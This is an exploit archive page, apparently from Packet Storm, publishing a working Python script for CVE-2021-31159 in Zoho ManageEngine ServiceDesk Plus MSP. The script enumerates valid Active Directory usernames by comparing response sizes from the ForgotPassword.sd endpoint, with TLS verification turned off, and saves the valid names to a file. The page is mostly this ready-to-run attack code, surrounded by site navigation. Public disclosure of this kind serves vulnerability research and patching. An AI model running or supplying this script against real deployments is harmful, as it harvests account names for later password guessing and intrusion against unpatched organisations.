Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration: Posted Jun 17, 2021; Authored by Ricardo Jose Ruiz Fernandez; Zoho ManageEngine ServiceDesk Plus version 9.4 suffers from a user enumeration vulnerability.; tags | exploit; advisories | CVE-2021-31159; SHA-256 | 870a1afb9f1433380867e92d6f4b12a310e6ee87a00b11040bf6cfbd0e03d858; Download | Favorite | View

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP - Active Directory User Enumeration (CVE-2021-31159)
# Date: 17/06/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
# Vendor Homepage: https://www.manageengine.com
# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
# Version: Previous to build 10519
# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159

import argparse
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def get_args():
  parser = argparse.ArgumentParser()
  parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
  parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
  parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')  
  parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
  my_args = parser.parse_args()
  return my_args


def main():
  args = get_args()
  url = args.target
  domain = args.domain
  usersfile = args.usersfile
  outputfile = args.outputfile

  s = requests.session()
  s.get(url)
  resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False)
  incorrect_size = len(resp_incorrect.content)
  print("Incorrect size: %s"%(incorrect_size))

  correct_users = []
  users = open(usersfile).read().splitlines()
  for u in users:
      resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False) 
      valid = (len(resp.content) != incorrect_size)
      if valid:
        correct_users.append(u)
      print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid)))

  print("\nCorrect users\n")
  with open(outputfile, 'w') as f:
    for user in correct_users:
      f.write("%s\n" % user)
      print("- %s"%(user))

  print("\nResults stored in %s\n"%(outputfile))


if __name__ == "__main__":
    main()

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

Share This

Zoho ManageEngine ServiceDesk Plus 9.4 User Enumeration

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems